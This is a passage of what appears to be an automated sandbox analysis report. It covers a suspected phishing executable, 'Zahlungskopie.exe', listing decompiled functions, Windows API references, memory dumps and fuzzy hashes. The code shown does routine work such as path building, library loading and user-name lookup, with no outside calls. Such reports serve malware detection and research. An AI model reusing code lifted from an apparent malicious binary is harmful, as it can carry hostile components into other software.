                                                                                                                                                                                                                          • Opcode ID: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
                                                                                                                                                                                                                          • Instruction ID: 3ba04cc2888c968bb17b12a51753cff707eeab9003a5d350ca2caef87bad7666
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E1D01235211111EBD7616B66AD44A9F7AA6DFC1351B060036F544F2191DB3C4846C669
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00406597, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00406597(wchar_t* __esi) {
				wchar_t* _t2;
				wchar_t* _t6;

				_t6 = __esi;
				E00404AD9(__esi);
				_t2 = wcsrchr(__esi, 0x2e);
				if(_t2 != 0) {
					 *_t2 =  *_t2 & 0x00000000;
				}
				return wcscat(_t6, L"_lng.ini");
			}





                                                                                                                                                                                                                          0x00406597
                                                                                                                                                                                                                          0x00406598
                                                                                                                                                                                                                          0x004065a0
                                                                                                                                                                                                                          0x004065aa
                                                                                                                                                                                                                          0x004065ac
                                                                                                                                                                                                                          0x004065ac
                                                                                                                                                                                                                          0x004065bd

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                                                                                                                          • wcsrchr.MSVCRT ref: 004065A0
                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 004065B6
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                                                                                                                          • String ID: _lng.ini
                                                                                                                                                                                                                          • API String ID: 383090722-1948609170
                                                                                                                                                                                                                          • Opcode ID: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
                                                                                                                                                                                                                          • Instruction ID: e4456dc4ef972d75cd366ed24565615e7e819105f92635e6590d4ece6e8d8120
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16C01292682620A4E2223322AC03B4F1248CF62324F21407BF906381C7EFBD826180EE
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 0040AC52, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E0040AC52() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;

				if( *0x4101c4 == 0) {
					_t1 = E00405436(L"shell32.dll");
					 *0x4101c4 = _t1;
					if(_t1 != 0) {
						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathW");
						 *0x4101c0 = _t2;
						return _t2;
					}
				}
				return _t1;
			}





                                                                                                                                                                                                                          0x0040ac59
                                                                                                                                                                                                                          0x0040ac60
                                                                                                                                                                                                                          0x0040ac68
                                                                                                                                                                                                                          0x0040ac6d
                                                                                                                                                                                                                          0x0040ac75
                                                                                                                                                                                                                          0x0040ac7b
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040ac7b
                                                                                                                                                                                                                          0x0040ac6d
                                                                                                                                                                                                                          0x0040ac80

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                                                                                                                            • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                                                                                                                            • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                                                                                                                            • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040AC75
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: LibraryLoad$AddressProcmemsetwcscat
                                                                                                                                                                                                                          • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                                                                                                                          • API String ID: 946536540-880857682
                                                                                                                                                                                                                          • Opcode ID: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
                                                                                                                                                                                                                          • Instruction ID: 297d67d15b42b64e279660486abf15c243c4c6a8dcafd005a32ae5f28444c9d4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9AD0C9B0D8A301ABE7106BB0AF05B523AA4B704301F12417BF800B12E0DBBE90888A1E
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00406670, Relevance: 5.1, APIs: 4, Instructions: 73COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 90%
                                                                                                                                                                                                                          			E00406670(char** __esi, void* __eflags) {
				char* _t30;
				char** _t39;

				_t39 = __esi;
				 *__esi = "cf@";
				__esi[0xb8] = 0;
				_t30 = E00404FA4(0x338, __esi);
				_push(0x14);
				__esi[0xcb] = 0;
				__esi[0xa6] = 0;
				__esi[0xb9] = 0;
				__esi[0xba] = 0xfff;
				__esi[8] = 0;
				__esi[1] = 0;
				__esi[0xb7] = 1;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[2] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[3] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[4] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_t39[5] = _t30;
				return _t39;
			}





                                                                                                                                                                                                                          0x00406670
                                                                                                                                                                                                                          0x0040667a
                                                                                                                                                                                                                          0x00406680
                                                                                                                                                                                                                          0x00406686
                                                                                                                                                                                                                          0x0040668b
                                                                                                                                                                                                                          0x0040668d
                                                                                                                                                                                                                          0x00406693
                                                                                                                                                                                                                          0x00406699
                                                                                                                                                                                                                          0x0040669f
                                                                                                                                                                                                                          0x004066a9
                                                                                                                                                                                                                          0x004066ac
                                                                                                                                                                                                                          0x004066af
                                                                                                                                                                                                                          0x004066b9
                                                                                                                                                                                                                          0x004066c7
                                                                                                                                                                                                                          0x004066d9
                                                                                                                                                                                                                          0x004066c9
                                                                                                                                                                                                                          0x004066c9
                                                                                                                                                                                                                          0x004066cc
                                                                                                                                                                                                                          0x004066cf
                                                                                                                                                                                                                          0x004066d2
                                                                                                                                                                                                                          0x004066d5
                                                                                                                                                                                                                          0x004066d5
                                                                                                                                                                                                                          0x004066db
                                                                                                                                                                                                                          0x004066dd
                                                                                                                                                                                                                          0x004066e0
                                                                                                                                                                                                                          0x004066e8
                                                                                                                                                                                                                          0x004066fa
                                                                                                                                                                                                                          0x004066ea
                                                                                                                                                                                                                          0x004066ea
                                                                                                                                                                                                                          0x004066ed
                                                                                                                                                                                                                          0x004066f0
                                                                                                                                                                                                                          0x004066f3
                                                                                                                                                                                                                          0x004066f6
                                                                                                                                                                                                                          0x004066f6
                                                                                                                                                                                                                          0x004066fc
                                                                                                                                                                                                                          0x004066fe
                                                                                                                                                                                                                          0x00406701
                                                                                                                                                                                                                          0x00406709
                                                                                                                                                                                                                          0x0040671b
                                                                                                                                                                                                                          0x0040670b
                                                                                                                                                                                                                          0x0040670b
                                                                                                                                                                                                                          0x0040670e
                                                                                                                                                                                                                          0x00406711
                                                                                                                                                                                                                          0x00406714
                                                                                                                                                                                                                          0x00406717
                                                                                                                                                                                                                          0x00406717
                                                                                                                                                                                                                          0x0040671d
                                                                                                                                                                                                                          0x0040671f
                                                                                                                                                                                                                          0x00406722
                                                                                                                                                                                                                          0x0040672a
                                                                                                                                                                                                                          0x0040673c
                                                                                                                                                                                                                          0x0040672c
                                                                                                                                                                                                                          0x0040672c
                                                                                                                                                                                                                          0x0040672f
                                                                                                                                                                                                                          0x00406732
                                                                                                                                                                                                                          0x00406735
                                                                                                                                                                                                                          0x00406738
                                                                                                                                                                                                                          0x00406738
                                                                                                                                                                                                                          0x0040673f
                                                                                                                                                                                                                          0x00406745

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??2@$memset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1860491036-0
                                                                                                                                                                                                                          • Opcode ID: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
                                                                                                                                                                                                                          • Instruction ID: f950f85206354bd8a0b3bb5dce35e971dba3beadb745d31d99e8bf3535aee89b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F121D4B0A007008FD7219F2AC448956FBE8FF90314B2689BFD15ADB2B1D7B89441DF18
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 004054DF, Relevance: 5.1, APIs: 4, Instructions: 67COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E004054DF(signed int* __eax, void* __ecx, wchar_t* _a4) {
				int _v8;
				signed int _v12;
				void* __edi;
				int _t32;
				intOrPtr _t33;
				intOrPtr _t36;
				signed int _t48;
				signed int _t58;
				signed int _t59;
				void** _t62;
				void** _t63;
				signed int* _t66;

				_t66 = __eax;
				_t32 = wcslen(_a4);
				_t48 =  *(_t66 + 4);
				_t58 = _t48 + _t32;
				_v12 = _t58;
				_t59 = _t58 + 1;
				_v8 = _t32;
				_t33 =  *((intOrPtr*)(_t66 + 0x14));
				 *(_t66 + 4) = _t59;
				_t62 = _t66 + 0x10;
				if(_t59 != 0xffffffff) {
					E00404951(_t66, _t59, _t62, 2, _t33);
				} else {
					free( *_t62);
				}
				_t60 =  *(_t66 + 0x1c);
				_t36 =  *((intOrPtr*)(_t66 + 0x18));
				_t63 = _t66 + 0xc;
				if( *(_t66 + 0x1c) != 0xffffffff) {
					E00404951(_t66 + 8, _t60, _t63, 4, _t36);
				} else {
					free( *_t63);
				}
				memcpy( *(_t66 + 0x10) + _t48 * 2, _a4, _v8 + _v8);
				 *((short*)( *(_t66 + 0x10) + _v12 * 2)) =  *( *(_t66 + 0x10) + _v12 * 2) & 0x00000000;
				 *( *_t63 +  *(_t66 + 0x1c) * 4) = _t48;
				 *(_t66 + 0x1c) =  *(_t66 + 0x1c) + 1;
				_t30 =  *(_t66 + 0x1c) - 1; // -1
				return _t30;
			}















                                                                                                                                                                                                                          0x004054ea
                                                                                                                                                                                                                          0x004054ec
                                                                                                                                                                                                                          0x004054f1
                                                                                                                                                                                                                          0x004054f4
                                                                                                                                                                                                                          0x004054f7
                                                                                                                                                                                                                          0x004054fa
                                                                                                                                                                                                                          0x004054fe
                                                                                                                                                                                                                          0x00405501
                                                                                                                                                                                                                          0x00405505
                                                                                                                                                                                                                          0x00405508
                                                                                                                                                                                                                          0x0040550b
                                                                                                                                                                                                                          0x0040551b
                                                                                                                                                                                                                          0x0040550d
                                                                                                                                                                                                                          0x0040550f
                                                                                                                                                                                                                          0x0040550f
                                                                                                                                                                                                                          0x00405521
                                                                                                                                                                                                                          0x00405527
                                                                                                                                                                                                                          0x0040552b
                                                                                                                                                                                                                          0x0040552e
                                                                                                                                                                                                                          0x0040553f
                                                                                                                                                                                                                          0x00405530
                                                                                                                                                                                                                          0x00405532
                                                                                                                                                                                                                          0x00405532
                                                                                                                                                                                                                          0x00405556
                                                                                                                                                                                                                          0x00405561
                                                                                                                                                                                                                          0x0040556e
                                                                                                                                                                                                                          0x00405571
                                                                                                                                                                                                                          0x00405578
                                                                                                                                                                                                                          0x0040557e

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 004054EC
                                                                                                                                                                                                                          • free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 0040550F
                                                                                                                                                                                                                            • Part of subcall function 00404951: malloc.MSVCRT ref: 0040496D
                                                                                                                                                                                                                            • Part of subcall function 00404951: memcpy.MSVCRT ref: 00404985
                                                                                                                                                                                                                            • Part of subcall function 00404951: free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E
                                                                                                                                                                                                                          • free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 00405532
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00405556
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free$memcpy$mallocwcslen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 726966127-0
                                                                                                                                                                                                                          • Opcode ID: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
                                                                                                                                                                                                                          • Instruction ID: a1978c74b5bce8e8bf6bff77aa8c6c4d26791a9d8288a70caf523018dd8727ee
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14216FB1500704EFC720DF68D881C9BB7F5EF483247208A6EF456A7691D735B9158B98
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00405ADF, Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 81%
                                                                                                                                                                                                                          			E00405ADF() {
				void* _t25;
				signed int _t27;
				signed int _t29;
				signed int _t31;
				signed int _t33;
				signed int _t50;
				signed int _t52;
				signed int _t54;
				signed int _t56;
				intOrPtr _t60;

				_t60 =  *0x41c470;
				if(_t60 == 0) {
					_t50 = 2;
					 *0x41c470 = 0x8000;
					_t27 = 0x8000 * _t50;
					 *0x41c474 = 0x100;
					 *0x41c478 = 0x1000;
					_push( ~(0 | _t60 > 0x00000000) | _t27);
					L0040B26C();
					 *0x41c458 = _t27;
					_t52 = 4;
					_t29 =  *0x41c474 * _t52;
					_push( ~(0 | _t60 > 0x00000000) | _t29);
					L0040B26C();
					 *0x41c460 = _t29;
					_t54 = 4;
					_t31 =  *0x41c474 * _t54;
					_push( ~(0 | _t60 > 0x00000000) | _t31);
					L0040B26C();
					 *0x41c464 = _t31;
					_t56 = 2;
					_t33 =  *0x41c478 * _t56;
					_push( ~(0 | _t60 > 0x00000000) | _t33);
					L0040B26C();
					 *0x41c45c = _t33;
					return _t33;
				}
				return _t25;
			}













                                                                                                                                                                                                                          0x00405adf
                                                                                                                                                                                                                          0x00405ae6
                                                                                                                                                                                                                          0x00405af5
                                                                                                                                                                                                                          0x00405af6
                                                                                                                                                                                                                          0x00405afb
                                                                                                                                                                                                                          0x00405b00
                                                                                                                                                                                                                          0x00405b0a
                                                                                                                                                                                                                          0x00405b18
                                                                                                                                                                                                                          0x00405b19
                                                                                                                                                                                                                          0x00405b1e
                                                                                                                                                                                                                          0x00405b2c
                                                                                                                                                                                                                          0x00405b2d
                                                                                                                                                                                                                          0x00405b36
                                                                                                                                                                                                                          0x00405b37
                                                                                                                                                                                                                          0x00405b3c
                                                                                                                                                                                                                          0x00405b4a
                                                                                                                                                                                                                          0x00405b4b
                                                                                                                                                                                                                          0x00405b54
                                                                                                                                                                                                                          0x00405b55
                                                                                                                                                                                                                          0x00405b5a
                                                                                                                                                                                                                          0x00405b68
                                                                                                                                                                                                                          0x00405b69
                                                                                                                                                                                                                          0x00405b72
                                                                                                                                                                                                                          0x00405b73
                                                                                                                                                                                                                          0x00405b7b
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00405b7b
                                                                                                                                                                                                                          0x00405b80

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??2@
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1033339047-0
                                                                                                                                                                                                                          • Opcode ID: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
                                                                                                                                                                                                                          • Instruction ID: f2da1691ca32ceef4ebb7ffb039160a3052a1a0853e807cf512b268ff05fa3b0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 850121B12C63005EE758DB38EDAB77A36A4E748754F00913EA146CE1F5EB7454408E4C
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Analysis Process: Zahlungskopie.exe PID: 6448 Parent PID: 984 Zahlungskopie.exeCOMMON

                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                          Function 05ED5A94, Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetUserNameW.ADVAPI32(00000000,00000000), ref: 05EDB63B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000012.00000002.920321711.0000000005ED0000.00000040.00000001.sdmp, Offset: 05ED0000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: NameUser
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2645101109-0
                                                                                                                                                                                                                          • Opcode ID: 768f8faf0180640470d53e6ed22ed291a89fe38dd1c4c83a3e80b50e54670dd0
                                                                                                                                                                                                                          • Instruction ID: 4b4a93c95a32d4c5370c968c9fda687554bc14e05738542fc78c6bdb0ab9353c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 768f8faf0180640470d53e6ed22ed291a89fe38dd1c4c83a3e80b50e54670dd0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5851F3B0D002188FDB14CFA9C885B9DFBB5BF48314F168129D855AB390E775A845CFA5
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 02B96940, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 02B969A0
                                                                                                                                                                                                                          • GetCurrentThread.KERNEL32 ref: 02B969DD
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 02B96A1A
                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 02B96A73
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000012.00000002.915197066.0000000002B90000.00000040.00000001.sdmp, Offset: 02B90000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Current$ProcessThread
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2063062207-0
                                                                                                                                                                                                                          • Opcode ID: 0a3e0a2cb89209946bd6ca976d52e9420ec43c4ec8ad927ada27b8ca3062b8ce
                                                                                                                                                                                                                          • Instruction ID: 866ae258cb10ee379ca7ce4a6fc7950efafda8613bae2b89e51d9b56664c90ff
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a3e0a2cb89209946bd6ca976d52e9420ec43c4ec8ad927ada27b8ca3062b8ce
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C5167B49002488FDB14CFA9D649BDEBBF4EF48314F2084A9E419B7750DB74A884CF65
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 02B95030, Relevance: 1.6, APIs: 1, Instructions: 144COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000012.00000002.915197066.0000000002B90000.00000040.00000001.sdmp, Offset: 02B90000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 63546d476568b18621aaa9ced7ee2a9867d79921e99b83f48faf67d93fcf58a7
                                                                                                                                                                                                                          • Instruction ID: a0c73505e91c0fd922cb9df792b1f91fc14d607809dcde1744346e96bf4b23fd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 63546d476568b18621aaa9ced7ee2a9867d79921e99b83f48faf67d93fcf58a7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B5103B1C00249AFDF16CFA9C980ADDBFB1FF49314F65816AE818AB220D7759985CF50
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 05EDB4F5, Relevance: 1.6, APIs: 1, Instructions: 143COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000012.00000002.920321711.0000000005ED0000.00000040.00000001.sdmp, Offset: 05ED0000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: e555b5c37423f1b71d13caae0358028bc80dcc8d1f2d75284161c92021a1e35a
                                                                                                                                                                                                                          • Instruction ID: 9abbf7d3776d0d3367e08e5a65858a58db98e78d77d81b4a4d0272412c629ef5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e555b5c37423f1b71d13caae0358028bc80dcc8d1f2d75284161c92021a1e35a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 955146B0D042188FDB04CFA8C885BADFBB5BF48314F16841AD895AB391E7749845CFA5
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 05ED921C, Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetUserNameW.ADVAPI32(00000000,00000000), ref: 05EDB63B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000012.00000002.920321711.0000000005ED0000.00000040.00000001.sdmp, Offset: 05ED0000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: NameUser
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2645101109-0
                                                                                                                                                                                                                          • Opcode ID: 66a941a28544f8457a259361c1001e0ac82e383fe563eeeac3688b0af492f613
                                                                                                                                                                                                                          • Instruction ID: f409a7f5c277f3c10bea3da53040f6b8ed49662c95ad4a94c44e5a742f8363c8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 66a941a28544f8457a259361c1001e0ac82e383fe563eeeac3688b0af492f613
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FC51F3B0E002188FDB14CFA9C885B9DFBB5BF48314F168129E855BB390E775A845CFA5
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 02B95090, Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02B951A2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000012.00000002.915197066.0000000002B90000.00000040.00000001.sdmp, Offset: 02B90000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateWindow
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 716092398-0
                                                                                                                                                                                                                          • Opcode ID: 2307805138fbb4d137d3820c8fe43c902743a24cf0b8b1095305365a30604721
                                                                                                                                                                                                                          • Instruction ID: 5767298a1dd2f7bcf5c719ae876f78a2a6f17ad873b526b919bf060fa4f58302
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2307805138fbb4d137d3820c8fe43c902743a24cf0b8b1095305365a30604721
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8741CFB1D003189FDF15CFA9C984ADEBBB5FF48314F64812AE819AB210D774A885CF90
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 05EDC130, Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,?,?,05EDC127), ref: 05EDC1BF
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000012.00000002.920321711.0000000005ED0000.00000040.00000001.sdmp, Offset: 05ED0000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CallbackDispatcherUser
